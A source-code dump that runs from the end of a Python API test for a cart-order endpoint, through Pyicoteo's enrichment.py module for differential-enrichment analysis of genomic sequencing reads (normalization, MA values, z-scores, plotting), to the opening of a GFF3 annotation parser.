assert cookie != response.cookies.get("session")
cookie = response.cookies.get("session")
response = auth_session.put(
domain_url + "/api/cart/order"
)
data = response.json()
ErrorSchema().load(data)
assert response.status_code == 400
assert cookie == response.cookies.get("session")
def test_order_unauthorized(domain_url):
response = requests.put(
domain_url + "/api/cart/order",
verify=False
)
data = response.json()
ErrorSchema().load(data)
assert response.status_code == 401
| mit | -2,006,155,102,493,854,700 | 23.52 | 78 | 0.628059 | false |
RegulatoryGenomicsUPF/pyicoteo | pyicoteolib/enrichment.py | 1 | 40209 | """
Pyicoteo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
import math
import random
from core import Cluster, Region, InvalidLine, InsufficientData, ConversionNotSupported
from defaults import *
import utils
import bam
from regions import AnnotationGene, AnnotationTranscript, AnnotationExon, RegionWriter, read_gff_file, get_exons, get_introns, gene_slide
import warnings
try:
from shutil import move
except:
from os import rename as move
"""
Differential expression and MA plot visualization module.
"""
def _region_from_dual(self, line):
try:
self.cluster_aux.clear()
self.cluster_aux.read_line(line)
strand = None
if self.stranded_analysis:
strand = self.cluster_aux.strand
ret = Region(self.cluster_aux.name, self.cluster_aux.start, self.cluster_aux.end, name2=self.cluster_aux.name2, strand=strand)
self.cluster_aux.clear()
return ret
except ValueError:
pass #discarding header
def __calc_reg_write(self, region_file, count, calculated_region):
if count > self.region_mintags:
region_file.write(calculated_region.write())
def calculate_region(self):
"""
Calculate a region file using the reads present in the both main files to analyze.
"""
self.logger.info('Generating regions...')
self.sorted_region_path = '%s/calcregion_%s.bed'%(self._output_dir(), os.path.basename(self.current_output_path))
region_file = open(self.sorted_region_path, 'wb')
if self.region_magic:
regwriter = RegionWriter(self.gff_file, region_file, self.region_magic, no_sort=self.no_sort, logger=self.logger, write_as=BED, galaxy_workarounds=self.galaxy_workarounds)
regwriter.write_regions()
dual_reader = utils.DualSortedReader(self.current_experiment_path, self.current_control_path, self.experiment_format, self.logger)
if self.stranded_analysis:
calculate_region_stranded(self, dual_reader, region_file)
else:
calculate_region_notstranded(self, dual_reader, region_file)
region_file.flush()
def __cr_append(self, regions, region):
regions.append(region)
def calculate_region_notstranded(self, dual_reader, region_file):
calculated_region = Region()
readcount = 1
for line in dual_reader:
if not calculated_region: #first region only
calculated_region = _region_from_dual(self, line)
calculated_region.end += self.proximity
else:
new_region = _region_from_dual(self, line)
new_region.end += self.proximity
if calculated_region.overlap(new_region):
calculated_region.join(new_region)
readcount += 1
else:
calculated_region.end -= self.proximity
__calc_reg_write(self, region_file, readcount, calculated_region)
calculated_region = new_region.copy()
readcount = 1
if calculated_region:
calculated_region.end -= self.proximity
__calc_reg_write(self, region_file, readcount, calculated_region)
def calculate_region_stranded(self, dual_reader, region_file):
temp_region_file = open(self.sorted_region_path, 'wb')
region_plus = Region()
region_minus = Region()
regions = []
numreads_plus = 1
numreads_minus = 1
dual_reader = utils.DualSortedReader(self.current_experiment_path, self.current_control_path, self.experiment_format, self.logger)
for line in dual_reader:
new_region = _region_from_dual(self, line)
new_region.end += self.proximity
if not (region_plus and new_region.strand == PLUS_STRAND):
region_plus = _region_from_dual(self, line)
elif not (region_plus and new_region.strand == PLUS_STRAND):
region_minus = _region_from_dual(self, line)
else:
if region_plus.overlap(new_region) and region_plus.strand == new_region.strand:
region_plus.join(new_region)
numreads_plus += 1
elif region_minus.overlap(new_region) and region_minus.strand == new_region.strand:
region_minus.join(new_region)
numreads_minus += 1
else:
if new_region.strand == region_plus.strand:
region_plus.end -= self.proximity
self.__calc_reg_write(region_file, numreads_plus, region_plus)
region_plus = new_region.copy()
numreads_plus = 1
else:
region_minus.end -= self.proximity
self.__calc_reg_write(region_file, numreads_minus, region_minus)
region_minus = new_region.copy()
numreads_minus = 1
if region_plus:
region_plus.end -= self.proximity
regions.append(region_plus)
if region_minus:
region_minus.end -= self.proximity
regions.append(region_minus)
regions.sort(key=lambda x:(x.name, x.start, x.end, x.strand))
for region in regions:
region_file.write(region.write())
def get_zscore(x, mean, sd):
if sd > 0:
return float(x-mean)/sd
else:
return 0 #This points are weird anyway
def read_interesting_regions(self, file_path):
regs = []
try:
regs_file = open(file_path, 'r')
for line in regs_file:
regs.append(line.strip())
except IOError as ioerror:
self.logger.warning("Interesting regions file not found")
return regs # memory inefficient if there's a large number of interesting regions
def plot_enrichment(self, file_path):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import *
from matplotlib import rcParams
rcParams.update({'font.size': 22})
rcParams['legend.fontsize'] = 14
#decide labels
if self.label1:
label_main = self.label1
else:
if self.real_control_path and self.real_experiment_path:
label_main = '%s VS %s'%(os.path.basename(self.real_experiment_path), os.path.basename(self.real_control_path))
else:
label_main = "A VS B"
if self.label2:
label_control = self.label2
else:
if self.replica_path:
label_control = '%s(A) VS %s(A)'%(os.path.basename(self.real_experiment_path), os.path.basename(self.replica_path))
else:
label_control = 'Background distribution'
#self.logger.info("Interesting regions path: %s" % (self.interesting_regions))
interesting_regs = []
if self.interesting_regions:
self.logger.info("Reading interesting regions...")
interesting_regs = read_interesting_regions(self, self.interesting_regions)
#self.logger.info("Interesting regions: %s" % (interesting_regs))
#self.logger.info("Plot path: %s" % (file_path))
interesting_A = []
interesting_M = []
#self.logger.info("disable_significant: %s" % (self.disable_significant_color))
A = []
A_prime = []
M = []
M_significant = []
A_significant = []
M_prime = []
A_medians = []
points = []
minus_points = []
all_points = []
figure(figsize=(14,22))
biggest_A = -sys.maxint #for drawing
smallest_A = sys.maxint #for drawing
biggest_M = 0 #for drawing
self.logger.info("Loading table...")
for line in open(file_path):
sline = line.split()
try:
enrich = dict(zip(enrichment_keys, sline))
# WARNING: for slide inter and slide intra: name2 = 'start:end' (no gene_id, FIXME?)
name2 = enrich['name2'].split(':')
gene_id = name2[0]
if len(name2) >= 2:
transcript_id = name2[1] # consider transcript_id? (exons)
else:
transcript_id = None
if gene_id in interesting_regs or transcript_id in interesting_regs:
interesting_M.append(float(enrich["M"]))
interesting_A.append(float(enrich["A"]))
biggest_A = max(biggest_A, float(enrich["A"]))
smallest_A = min(smallest_A, float(enrich["A"]))
biggest_M = max(biggest_M, abs(float(enrich["M"])))
biggest_A = max(biggest_A, float(enrich["A_prime"]))
smallest_A = min(smallest_A, float(enrich["A_prime"]))
biggest_M = max(biggest_M, abs(float(enrich["M_prime"])))
positive_point = self.zscore*float(enrich["sd"])+float(enrich["mean"])
negative_point = -self.zscore*float(enrich["sd"])+float(enrich["mean"])
A_median = float(enrich["A_median"])
all_points.append((A_median, positive_point, negative_point))
if abs(float(enrich["zscore"])) < self.zscore:
M.append(float(enrich["M"]))
A.append(float(enrich["A"]))
else:
M_significant.append(float(enrich["M"]))
A_significant.append(float(enrich["A"]))
M_prime.append(float(enrich["M_prime"]))
A_prime.append(float(enrich["A_prime"]))
except ValueError:
pass #to skip the header
all_points.sort(key= lambda x:x[0])
for t in all_points:
(A_medians.append(t[0]), points.append(t[1]), minus_points.append(t[2]))
if points:
margin = 1.1
A_medians.append(biggest_A*margin)
points.append(points[-1])
minus_points.append(minus_points[-1])
A_medians.insert(0, smallest_A)
points.insert(0, points[0])
minus_points.insert(0, minus_points[0])
self.logger.info("Plotting points...")
#Background plot
subplot(211, axisbg="lightyellow")
xlabel('Average', fontsize=30)
ylabel('Log2 ratio', fontsize=30)
axis([smallest_A*margin, biggest_A*margin, -biggest_M*margin, biggest_M*margin])
plot(A_prime, M_prime, '.', label=label_control, color = '#666666')
plot(A_medians, points, 'r--', label="Z-score (%s)"%self.zscore)
plot(A_medians, minus_points, 'r--')
axhline(0, linestyle='--', color="grey", alpha=0.75)
leg = legend(fancybox=True, scatterpoints=1, numpoints=1, loc=2, ncol=4, mode="expand")
leg.get_frame().set_alpha(0.5)
#Experiment plot
subplot(212, axisbg="lightyellow")
axis([smallest_A*margin, biggest_A*margin, -biggest_M*margin, biggest_M*margin])
plot(A, M, 'k.', label=label_main)
if self.disable_significant_color:
significant_marker = 'ko'
else:
significant_marker = 'ro'
plot(A_significant, M_significant, significant_marker, label="%s (significant)"%label_main)
plot(A_medians, points, 'r--', label="Z-score (%s)"%self.zscore)
plot(A_medians, minus_points, 'r--')
if self.interesting_regions:
interesting_label = label_main + ' (interesting)'
plot(interesting_A, interesting_M, 'H', label=interesting_label, color='#00EE00') # plotting "interesting" regions
axhline(0, linestyle='--', color="grey", alpha=0.75)
xlabel('Average', fontsize=30)
ylabel('Log2 ratio', fontsize=30)
leg2 = legend(fancybox=True, scatterpoints=1, numpoints=1, loc=2, ncol=4)
leg2.get_frame().set_alpha(0.7)
self._save_figure("enrichment_MA", width=500, height=2800)
else:
self.logger.warning("Nothing to plot.")
except ImportError:
if self.debug:
raise
__matplotlibwarn(self)
def __matplotlibwarn(self):
#FIXME move to utils.py or plotting module
self.logger.warning('Pyicos can not find an installation of matplotlib, so no plot will be drawn. If you want to get a plot with the correlation values, install the matplotlib library.')
def __calc_M(signal_a, signal_b):
return math.log(float(signal_a)/float(signal_b), 2)
def __calc_A(signal_a, signal_b):
return (math.log(float(signal_a), 2)+math.log(float(signal_b), 2))/2
def _calculate_MA(self, region_path, read_counts, factor = 1, replica_factor = 1, file_a_reader=None, file_b_reader=None, replica_reader=None):
tags_a = []
tags_b = []
numreads_background_1 = 0
numreads_background_2 = 0
total_reads_background_1 = 0
total_reads_background_2 = 0
self.logger.debug("Inside _calculate_MA")
self.regions_analyzed_count = 0
enrichment_result = [] #This will hold the name, start and end of the region, plus the A, M, 'A and 'M
if NOWRITE not in self.operations:
out_file = open(self.current_output_path, 'wb')
for region_line in open(region_path):
sline = region_line.split()
region_of_interest = self._region_from_sline(sline)
if region_of_interest:
region_a = None
replica = None
replica_tags = None
signal_a = -1
signal_b = -1
signal_background_1 = -1
signal_background_2 = -1
swap1 = Region()
swap2 = Region()
if read_counts:
signal_a = float(sline[6])
signal_b = float(sline[7])*factor
signal_background_1 = float(sline[8])
signal_background_2 = float(sline[9])*replica_factor
if CHECK_REPLICAS in self.operations:
self.experiment_values.append(signal_background_1)
self.replica_values.append(signal_background_2)
else:
self.logger.debug("Reading tags for %s ..."%region_of_interest)
if self.experiment_format == BAM:
tags_a = len(file_a_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
tags_b = len(file_b_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
else:
tags_a = file_a_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
tags_b = file_b_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
if self.use_replica:
if self.experiment_format == BAM:
replica_tags = len(replica_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
else:
replica_tags = replica_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
self.logger.debug("... done. tags_a: %s tags_b: %s"%(tags_a, tags_b))
#if we are using pseudocounts, use the union, use the intersection otherwise
if (self.pseudocount and (tags_a or tags_b)) or (not self.pseudocount and tags_a and tags_b):
signal_a = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount, factor, self.total_reads_a, tags_a)
signal_b = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount, factor, self.total_reads_b, tags_b)
self.already_norm = True
if not self.counts_file:
if (self.pseudocount and (tags_a or tags_b)) or (not self.pseudocount and tags_a and tags_b):
if self.use_replica:
replica = region_of_interest.copy()
#replica.add_tags(replica_tags)
numreads_background_1 = tags_a
numreads_background_2 = replica_tags
total_reads_background_1 = self.total_reads_a
total_reads_background_2 = self.total_reads_replica
signal_background_1 = signal_a
signal_background_2 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.total_reads_replica, replica_tags)
else:
numreads_background_1 = 0
numreads_background_2 = 0
for i in range(0, tags_a+tags_b):
if random.uniform(0,2) > 1:
numreads_background_1 += 1
else:
numreads_background_2 += 1
total_reads_background_1 = total_reads_background_2 = self.average_total_reads
signal_background_1 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.average_total_reads, numreads_background_1)
signal_background_2 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.average_total_reads, numreads_background_2)
#if there is no data in the replica or in the swap and we are not using pseudocounts, dont write the data
if signal_a > 0 and signal_b > 0 and signal_background_1 > 0 and signal_background_2 > 0 or self.use_MA:
if self.use_MA and not self.already_norm:
A = float(sline[10])
M = float(sline[11])
A_prime = float(sline[16])
M_prime = float(sline[17])
else:
if not self.already_norm: #TODO refractor
if self.len_norm: #read per kilobase in region
signal_a = 1e3*(float(signal_a)/len(region_of_interest))
signal_b = 1e3*(float(signal_b)/len(region_of_interest))
signal_background_1 = 1e3*(float(signal_background_1)/len(region_of_interest))
signal_background_2 = 1e3*(float(signal_background_2)/len(region_of_interest))
if self.n_norm: #per million reads in the sample
signal_a = 1e6*(float(signal_a)/self.total_reads_a)
signal_b = 1e6*(float(signal_b)/self.total_reads_b)
if self.use_replica:
signal_background_1 = signal_a
signal_background_2 = 1e6*(float(signal_background_2)/self.total_reads_replica)
else:
signal_background_1 = 1e6*(float(signal_background_1)/self.average_total_reads)
signal_background_2 = 1e6*(float(signal_background_2)/self.average_total_reads)
A = __calc_A(signal_a, signal_b)
M = __calc_M(signal_a, signal_b)
A_prime = __calc_A(signal_background_1, signal_background_2)
M_prime = __calc_M(signal_background_1, signal_background_2)
if CHECK_REPLICAS in self.operations:
self.experiment_values.append(signal_background_1)
self.replica_values.append(signal_background_2)
if NOWRITE not in self.operations:
out_file.write("%s\n"%("\t".join([region_of_interest.write().rstrip("\n"), str(signal_a), str(signal_b), str(signal_background_1), str(signal_background_2), str(A), str(M), str(self.total_reads_a), str(self.total_reads_b), str(tags_a), str(tags_b), str(A_prime), str(M_prime), str(total_reads_background_1), str(total_reads_background_2), str(numreads_background_1), str(numreads_background_2)])))
self.regions_analyzed_count += 1
self.logger.debug("LEAVING _calculate_MA")
if NOWRITE in self.operations:
return ""
else:
out_file.flush()
out_file.close()
# Outputting to HTML (if specified)
if self.html_output is not None:
self.logger.info("Generating HTML")
try:
from jinja2 import Environment, PackageLoader, Markup
except:
self.logger.error("Could not find the jinja2 library")
return out_file.name
loadr = PackageLoader('pyicoteolib', 'templates')
env = Environment(loader=loadr)
template = env.get_template('enrich_html.html')
def jinja_read_file(filename):
f = open(filename, 'r')
#for line in f:
# print line
txt = ''.join(f.readlines())
f.close()
return txt
env.globals['jinja_read_file'] = jinja_read_file
if self.galaxy_workarounds: # Galaxy changes the working directory when outputting multiple files
parent_dir = "./"
else:
parent_dir = os.sep.join(out_file.name.split(os.sep)[0:-1]) + "/"
plot_path = parent_dir + "enrichment_MA_" + out_file.name.split(os.sep)[-1] + ".png"
bed_path = parent_dir + out_file.name.split(os.sep)[-1]
html_file = open(self.html_output, 'w')
html_file.write(template.render({'page_title': 'Enrichment results', 'results_output': jinja_read_file(out_file.name), 'plot_path': plot_path, 'bed_path': bed_path}))
html_file.flush()
html_file.close()
return out_file.name
def _calculate_total_lengths(self):
msg = "Calculating enrichment in regions"
if self.counts_file:
self.sorted_region_path = self.counts_file
if (not self.total_reads_a or not self.total_reads_b or (not self.total_reads_replica and self.use_replica)) and not self.use_MA:
self.logger.info("... counting from counts file...")
self.total_reads_a = 0
self.total_reads_b = 0
if self.total_reads_replica:
self.total_reads_replica = 0
else:
self.total_reads_replica = 1
for line in open(self.counts_file):
try:
enrich = dict(zip(enrichment_keys, line.split()))
self.total_reads_a += float(enrich["signal_a"])
self.total_reads_b += float(enrich["signal_b"])
if self.use_replica:
self.total_reads_replica += float(enrich["signal_prime_2"])
except ValueError:
self.logger.debug("(Counting) skip header...")
else:
self.logger.info("... counting number of lines in files...")
if not self.total_reads_a:
if self.experiment_format == BAM:
self.total_reads_a = bam.size(self.current_experiment_path)
else:
self.total_reads_a = sum(1 for line in utils.open_file(self.current_experiment_path, self.experiment_format, logger=self.logger))
if not self.total_reads_b:
if self.experiment_format == BAM:
self.total_reads_b = bam.size(self.current_control_path)
else:
self.total_reads_b = sum(1 for line in utils.open_file(self.current_control_path, self.control_format, logger=self.logger))
if self.use_replica and not self.total_reads_replica:
if self.experiment_format == BAM:
self.total_reads_replica = bam.size(self.replica_path)
else:
self.total_reads_replica = sum(1 for line in utils.open_file(self.replica_path, self.experiment_format, logger=self.logger))
self.logger.debug("Number lines in experiment A: %s Experiment B: %s"%(self.total_reads_a, self.total_reads_b))
if self.use_replica:
msg = "%s using replicas..."%msg
else:
msg = "%s using swap..."%msg
self.logger.info(msg)
self.average_total_reads = (self.total_reads_a+self.total_reads_b)/2
def enrichment(self):
file_a_reader = file_b_reader = replica_reader = None
self.use_replica = (bool(self.replica_path) or (bool(self.counts_file) and self.use_replica_flag))
self.logger.debug("Use replica: %s"%self.use_replica)
if not USE_MA in self.operations:
_calculate_total_lengths(self)
if not self.counts_file:
file_a_reader = utils.read_fetcher(self.current_experiment_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
file_b_reader = utils.read_fetcher(self.current_control_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
if self.use_replica:
replica_reader = utils.read_fetcher(self.current_replica_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
if self.sorted_region_path:
self.logger.info('Using region file %s (%s)'%(self.region_path, self.region_format))
else:
calculate_region(self) #create region file semi automatically
self.total_regions = sum(1 for line in open(self.sorted_region_path))
self.logger.info("... analyzing regions, calculating normalized counts, A / M and replica or swap...")
self.already_norm = False
if self.use_MA:
ma_path = self.counts_file
else:
ma_path = self.sorted_region_path
out_path = _calculate_MA(self, ma_path, bool(self.counts_file), 1, 1, file_a_reader, file_b_reader, replica_reader)
self.already_norm = True
self.logger.debug("Already normalized: %s"%self.already_norm)
if self.tmm_norm:
if CHECK_REPLICAS in self.operations:
self.experiment_values = []
self.replica_values = []
self.logger.info("TMM Normalizing...")
tmm_factor = calc_tmm_factor(self, out_path, self.regions_analyzed_count, False)
replica_tmm_factor = 1
if self.use_replica:
replica_tmm_factor = calc_tmm_factor(self, out_path, self.regions_analyzed_count, True)
#move output file to old output
#use as input
old_output = '%s/notnormalized_%s'%(self._current_directory(), os.path.basename(self.current_output_path))
move(os.path.abspath(self.current_output_path), old_output)
out_path = _calculate_MA(self, old_output, True, tmm_factor, replica_tmm_factor, True) #recalculate with the new factor, using the counts again
if self.quant_norm:
self.logger.info("Full quantile normalization...")
signal_a = []
signal_prime_1 = []
enrich = []
for line in open(out_path):
sline = line.split()
enrich_line = dict(zip(enrichment_keys, sline))
enrich.append(enrich_line)
signal_a.append(float(enrich_line['signal_a']))
signal_prime_1.append(float(enrich_line['signal_prime_1']))
#full quantile normalization
signal_a.sort()
enrich.sort(key=lambda x:float(x['signal_b']))
quant_counts = open('%s/quantcounts_%s'%(self._current_directory(), os.path.basename(self.current_output_path)), 'w')
for i in range(len(enrich)):
enrich[i]['signal_b'] = signal_a[i]
self.logger.info("Full quantile normalization replica...")
#full quantile normalization of the replica
signal_prime_1.sort()
enrich.sort(key=lambda x:float(x['signal_prime_2']))
for i in range(len(enrich)):
enrich[i]['signal_prime_2'] = signal_prime_1[i]
quant_counts.write("%s\n"%"\t".join(str(enrich[i][key]) for key in enrichment_keys[:20])) #write the lines
quant_counts.flush()
out_path = _calculate_MA(self, quant_counts.name, True, 1, 1, True) #recalculate with the new factor, using the counts again
self._manage_temp_file(quant_counts.name)
self.logger.info("%s regions analyzed."%self.regions_analyzed_count)
if not NOWRITE in self.operations:
self.logger.info("Enrichment result saved to %s"%self.current_output_path)
if CHECK_REPLICAS in self.operations:
check_replica(self)
return out_path
def _sub_tmm(counts_a, counts_b, reads_a, reads_b):
return (counts_a-reads_a)/(counts_a*reads_a) + (counts_b-reads_b)/(counts_b*reads_b)
def calc_tmm_factor(self, file_counts, total_regions, replica):
if replica:
signal_1 = "signal_prime_1"
signal_2 = "signal_prime_2"
M = "M_prime"
reads_2 = self.total_reads_replica
else:
signal_1 = "signal_a"
signal_2 = "signal_b"
M = "M"
reads_2 = self.total_reads_b
values_list = []
#read the file inside the values_list
for line in open(file_counts):
sline = line.split()
values_list.append(dict(zip(enrichment_keys, sline)))
a_trim_number = int(round(total_regions*self.a_trim))
#discard the bad A
self.logger.debug("Removing the worst A (%s regions, %s percent)"%(a_trim_number, self.a_trim*100))
values_list.sort(key=lambda x:float(x["A"])) #sort by A
for i in range (0, a_trim_number):
values_list.pop(0)
values_list.sort(key=lambda x:float(x[M])) #sort by M
m_trim_number = int(round(total_regions*(self.m_trim/2))) #this number is half the value of the flag, because we will trim half below, and half over
#remove on the left
for i in range(0, m_trim_number):
values_list.pop(0)
#remove on the right
for i in range(0, m_trim_number):
values_list.pop(-1)
#now calculate the normalization factor
arriba = 0
abajo = 0
for value in values_list:
w = _sub_tmm(float(value[signal_1]), float(value[signal_2]), self.total_reads_a, reads_2)
arriba += w*float(value[M])
abajo += w
try:
factor = 2**(arriba/abajo)
except ZeroDivisionError:
self.logger.warning("Division by zero, TMM factor could not be calculated.")
factor = 1
if replica:
self.logger.info("Replica TMM Normalization Factor: %s"%factor)
else:
self.logger.info("TMM Normalization Factor: %s"%factor)
return factor
def __load_enrichment_result(values_path):
ret = []
for line in open(values_path):
sline = line.split()
try:
float(sline[1])
ret.append(dict(zip(enrichment_keys, sline)))
except ValueError:
pass
return ret
def calculate_zscore(self, values_path):
num_regions = sum(1 for line in open(values_path))
bin_size = int(self.binsize*num_regions)
if bin_size < 50:
self.logger.warning("The bin size results in a sliding window smaller than 50, adjusting window to 50 in order to get statistically meaningful results.")
bin_size = 50
bin_step = max(1, int(round(self.bin_step*bin_size)))
self.logger.info("Enrichment window calculation using a sliding window size of %s, sliding with a step of %s"%(bin_size, bin_step))
self.logger.info("... calculating zscore...")
enrichment_result = __load_enrichment_result(values_path)
enrichment_result.sort(key= lambda x:(float(x["A_prime"])))
self.logger.debug("Number of loaded counts: %s"%len(enrichment_result))
self.points = []
#get the standard deviations
for i in range(0, num_regions-bin_size+bin_step, bin_step):
#get the slice
if i+bin_size < num_regions:
result_chunk = enrichment_result[i:i+bin_size]
else:
result_chunk = enrichment_result[i:] #last chunk
#retrieve the values
mean_acum = 0
a_acum = 0
Ms_replica = []
for entry in result_chunk:
mean_acum += float(entry["M_prime"])
a_acum += float(entry["A_prime"])
Ms_replica.append(float(entry["M_prime"]))
#add them to the points of mean and sd
mean = mean_acum/len(result_chunk)
sd = math.sqrt((sum((x - mean)**2 for x in Ms_replica))/len(Ms_replica))
#the A median
A_median = a_acum / len(result_chunk)
self.points.append([A_median, mean, sd]) #The A asigned to the window, the mean and the standard deviation
#self.logger.debug("Window of %s length, with A median: %s mean: %s sd: %s"%(len(result_chunk), self.points[-1][0], self.points[-1][1], self.points[-1][2], len(self.points)))
#update z scores
for entry in enrichment_result:
entry["A_median"] = 0
entry["mean"] = 0
entry["sd"] = 0
entry["zscore"] = 0
closest_A = sys.maxint
sd_position = 0
for i in range(0, len(self.points)):
new_A = self.points[i][0]
if new_A != closest_A: #skip repeated points
if abs(closest_A - float(entry["A"])) >= abs(new_A - float(entry["A"])):
closest_A = new_A
sd_position = i
else:
break #already found, no need to go further since the points are ordered
entry["A_median"] = closest_A
if self.points: #only calculate if there where windows...
__sub_zscore(self.sdfold, entry, self.points[sd_position])
if not self.points: # ... otherwise give a warning
self.logger.warning("Insufficient number of regions analyzed (%s), z-score values could not be calculated"%num_regions)
enrichment_result.sort(key=lambda x:(x["name"], int(x["start"]), int(x["end"])))
old_file_path = '%s/before_zscore_%s'%(self._current_directory(), os.path.basename(values_path)) #create path for the outdated file
move(os.path.abspath(values_path), old_file_path) #move the file
new_file = file(values_path, 'w') #open a new file in the now empty file space
if not self.skip_header:
new_file.write('\t'.join(enrichment_keys))
new_file.write('\n')
for entry in enrichment_result:
new_file.write("\t".join(str(entry[key]) for key in enrichment_keys)+"\n")
self._manage_temp_file(old_file_path)
return values_path
def __sub_zscore(sdfold, entry, point):
entry["mean"] = str(point[1])
entry["sd"] = str(point[2])
entry["zscore"] = str(get_zscore(float(entry["M"]), float(entry["mean"]), sdfold*float(entry["sd"])))
def check_replica(self):
#discard everything below the flag
new_experiment = []
new_replica = []
min_value = sys.maxint
max_value = -sys.maxint
for i in range(len(self.replica_values)):
if self.experiment_values[i] > self.count_filter and self.replica_values[i] > self.count_filter:
new_experiment.append(math.log(self.experiment_values[i], 2))
new_replica.append(math.log(self.replica_values[i], 2))
min_value = min(min_value, math.log(self.experiment_values[i], 2), math.log(self.replica_values[i], 2))
max_value = max(max_value, math.log(self.experiment_values[i], 2), math.log(self.replica_values[i], 2))
#print self.replica_values
self.experiment_values = new_experiment
self.replica_values = new_replica
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import plot, show, xlabel, ylabel, axhline, axis, clf, text, title, xlim, ylim
except:
__matplotlibwarn(self)
return 0
clf()
r_squared = utils.pearson(self.experiment_values, self.replica_values)**2
text(min_value+abs(max_value)*0.1, max_value-abs(max_value)*0.2, r'Pearson $R^2$= %s'%round(r_squared, 3), fontsize=18, bbox={'facecolor':'yellow', 'alpha':0.5, 'pad':10})
xlabel("log2(%s)"%self.experiment_label, fontsize=18)
ylabel("log2(%s)"%self.replica_label, fontsize=18)
xlim(min_value, max_value)
ylim(min_value, max_value)
title(self.title_label, fontsize=24)
plot(self.experiment_values, self.replica_values, '.')
self._save_figure("check_replica")
def check_replica_correlation(self):
"No usado, de momento"
min_tags = 20
experiment_reader = utils.read_fetcher(self.current_experiment_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential)
replica_reader = utils.read_fetcher(self.current_replica_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential)
correlations_acum = 0
num_correlations = 0
for region_line in open(self.region_path):
sline = region_line.split()
region_experiment = self._region_from_sline(sline)
region_replica = region_experiment.copy()
tags_experiment = experiment_reader.get_overlaping_clusters(region_experiment, overlap=1)
tags_replica = replica_reader.get_overlaping_clusters(region_experiment, overlap=1)
count_experiment = len(tags_experiment)
count_replica = len(tags_replica)
correlations = []
if count_experiment+count_replica > min_tags:
region_experiment.add_tags(tags_experiment, clusterize=True)
region_replica.add_tags(tags_replica, clusterize=True)
num_correlations += 1
correlation = utils.pearson(region_experiment.get_array(), region_replica.get_array())
correlations_acum += max(0, correlation)
correlations.append(correlation)
print correlations_acum/num_correlations
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import plot, boxplot, show, legend, figure, xlabel, ylabel, subplot, axhline, axis
except:
__matplotlibwarn(self)
return 0
print correlations
boxplot(correlations)
self._save_figure("check_replica") | gpl-3.0 | 5,883,346,573,406,230,000 | 46.64218 | 418 | 0.583999 | false |
lyijin/working_with_dna_meth | parse_gff3.py | 1 | 8333 | #!/usr/bin/env python3
"""
> parse_gff3.py <
Python script intends to be a helper function that can be called by other
scripts to handle gff annotations.
Script requires a _file object_ (not filename).
The output is in the form of:
dict[seqid] = {five_prime_UTR: {ID001: (start_coord1, end_coord1), ...}
three_prime_UTR: {ID001: (start_coord2, end_coord2), ...}
gene: ...
exon: ...
CDS: ...
...: ...}
"""
# from http://genome.ucsc.edu/FAQ/FAQformat.html#format3:
# Here is a brief description of the GFF fields:
# seqid - The name of the sequence. Must be a chromosome or scaffold.
# source - The program that generated this feature.
# feature - The name of this type of feature. Some examples of standard
# feature types are "CDS", "start_codon", "stop_codon", and "exon".
# start - The starting position of the feature in the sequence. The first base
# is numbered 1.
# end - The ending position of the feature (inclusive).
# score - A score between 0 and 1000. If the track line useScore attribute is
# set to 1 for this annotation data set, the score value will
# determine the level of gray in which this feature is displayed
# (higher numbers = darker gray). If there is no score value, enter ".".
# strand - Valid entries include '+', '-', or '.' (for don't know/don't care).
# frame - If the feature is a coding exon, frame should be a number between
# 0-2 that represents the reading frame of the first base. If the
# feature is not a coding exon, the value should be '.'.
# group - All lines with the same group are linked together into a single item.
# sample line:
# RNA-1;1.gff:1000131 maker five_prime_UTR 1968 1999 .
# + . ID=maker-1000131-exonerate...
# IMPORTANT NOTE ABOUT startpos AND endpos: the biological definition of
# position (1-based) is BAD at dealing with the edge case of startpos == endpos.
# If startpos == endpos, then there's no way to tell whether it's on the
# '+' strand or the '-' strand.
# Thus, startpos and endpos produced by the parse_gff3 def follows the Python
# convention (starting base is sequence[0:1]), which allows for the
# discrimination of '+' and '-' strands.
# e.g. if startpos = 2 and endpos = 3: '+' strand } both refer to
# if endpos = 2 and startpos = 3: '-' strand } the same base
import csv
import re
class Gene:
def __init__(self, coords):
self.coords = coords
self.mRNAs = {}
def __len__(self):
return abs(self.coords[1] - self.coords[0])
def add_mRNA(self, mRNA_id, coords):
"""'mRNA' is a class!"""
self.mRNAs[mRNA_id] = mRNA(coords)
class mRNA:
def __init__(self, coords):
self.coords = coords
self.details = {}
def __len__(self):
return abs(self.coords[1] - self.coords[0])
def add_feature(self, feature_id, coords):
"""coords is a tuple!"""
if feature_id not in self.details:
self.details[feature_id] = []
self.details[feature_id].append(coords)
